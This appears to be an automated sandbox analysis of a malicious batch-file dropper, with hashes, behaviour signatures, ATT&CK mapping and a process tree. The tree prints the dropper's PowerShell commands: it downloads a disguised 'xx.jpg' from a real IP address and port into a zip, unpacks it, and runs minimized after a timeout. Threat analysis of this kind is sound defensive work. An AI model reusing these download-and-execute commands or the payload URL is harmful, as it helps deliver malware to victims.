64c79060f8478363e93ae210e0bd7ba9178fecdd1a0badba4fed5382180d3a80

General

Target

64c79060f8478363e93ae210e0bd7ba9178fecdd1a0badba4fed5382180d3a80.bat
Size

2KB
MD5

0e2fff554ddadc58aaff7978ec06aa32
SHA1

b453b17905235ea96150c90711285f7879d3afc0
SHA256

64c79060f8478363e93ae210e0bd7ba9178fecdd1a0badba4fed5382180d3a80
SHA512

c54cc4c956dc733835d0d40d49377b23b8b63bfa118e0e9ed5bba18e2b2b5f4a33656cd5b75230cd7dec05a98a3bc4b84b429121cffe3644fff72fc628b83b76

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://109.199.101.109:770/xx.jpg

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 2592 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Start PowerShell.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2852 powershell.exe
2592 powershell.exe
2688 powershell.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1928 timeout.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2852 powershell.exe
2852 powershell.exe
2852 powershell.exe
2592 powershell.exe
2688 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2852 powershell.exe
Token: SeDebugPrivilege 2592 powershell.exe
Token: SeDebugPrivilege 2688 powershell.exe

flow	pid	process
4	2592	powershell.exe

pid	process
2852	powershell.exe
2592	powershell.exe
2688	powershell.exe

pid	process
1928	timeout.exe

pid	process
2852	powershell.exe
2852	powershell.exe
2852	powershell.exe
2592	powershell.exe
2688	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2852	powershell.exe
Token: SeDebugPrivilege	2592	powershell.exe
Token: SeDebugPrivilege	2688	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

cmd.exepowershell.execmd.exe

description	pid	process	target process
PID 2068 wrote to memory of 2852	2068	cmd.exe	powershell.exe
PID 2068 wrote to memory of 2852	2068	cmd.exe	powershell.exe
PID 2068 wrote to memory of 2852	2068	cmd.exe	powershell.exe
PID 2852 wrote to memory of 2856	2852	powershell.exe	cmd.exe
PID 2852 wrote to memory of 2856	2852	powershell.exe	cmd.exe
PID 2852 wrote to memory of 2856	2852	powershell.exe	cmd.exe
PID 2856 wrote to memory of 2592	2856	cmd.exe	powershell.exe
PID 2856 wrote to memory of 2592	2856	cmd.exe	powershell.exe
PID 2856 wrote to memory of 2592	2856	cmd.exe	powershell.exe
PID 2856 wrote to memory of 2688	2856	cmd.exe	powershell.exe
PID 2856 wrote to memory of 2688	2856	cmd.exe	powershell.exe
PID 2856 wrote to memory of 2688	2856	cmd.exe	powershell.exe
PID 2856 wrote to memory of 1928	2856	cmd.exe	timeout.exe
PID 2856 wrote to memory of 1928	2856	cmd.exe	timeout.exe
PID 2856 wrote to memory of 1928	2856	cmd.exe	timeout.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\64c79060f8478363e93ae210e0bd7ba9178fecdd1a0badba4fed5382180d3a80.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2068
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\64c79060f8478363e93ae210e0bd7ba9178fecdd1a0badba4fed5382180d3a80.bat' -ArgumentList 'minimized' -WindowStyle Minimized"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2852
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\64c79060f8478363e93ae210e0bd7ba9178fecdd1a0badba4fed5382180d3a80.bat" minimized "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2856
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://109.199.101.109:770/xx.jpg', 'C:\Users\Admin\Documents\x.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2592
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Expand-Archive -Path 'C:\Users\Admin\Documents\x.zip' -DestinationPath 'C:\Users\Admin\Documents'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2688
  - - C:\Windows\system32\timeout.exe
      timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1928

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
98f52202f8b35013c0be63f394edf31e

SHA1
aa80a0a49896d3d486bcb413a710fc347fa4882c

SHA256
662f63097f1cfdf9912cdc00df2e2dc11496950ff6c26e840cecf987fa469233

SHA512
d7b7a6c92fbb44b30bc5d1056cad70db63acadc1f122628e3dcb85001bd980fd50b063308be6cd6d9724d56274ad647b0b73b37b4fe3f32dd12d6597d27296ff

Download Submit
memory/2592-19-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download
memory/2592-18-0x000000001B630000-0x000000001B912000-memory.dmp

Filesize
2.9MB

Download
memory/2852-4-0x000007FEF69FE000-0x000007FEF69FF000-memory.dmp

Filesize
4KB

Download
memory/2852-5-0x000000001B640000-0x000000001B922000-memory.dmp

Filesize
2.9MB

Download
memory/2852-6-0x0000000002350000-0x0000000002358000-memory.dmp

Filesize
32KB

Download
memory/2852-7-0x000007FEF6740000-0x000007FEF70DD000-memory.dmp

Filesize
9.6MB

Download
memory/2852-8-0x000007FEF6740000-0x000007FEF70DD000-memory.dmp

Filesize
9.6MB

Download
memory/2852-9-0x000007FEF6740000-0x000007FEF70DD000-memory.dmp

Filesize
9.6MB

Download
memory/2852-10-0x000007FEF6740000-0x000007FEF70DD000-memory.dmp

Filesize
9.6MB

Download
memory/2852-12-0x000007FEF6740000-0x000007FEF70DD000-memory.dmp

Filesize
9.6MB

Download
memory/2852-11-0x000007FEF6740000-0x000007FEF70DD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing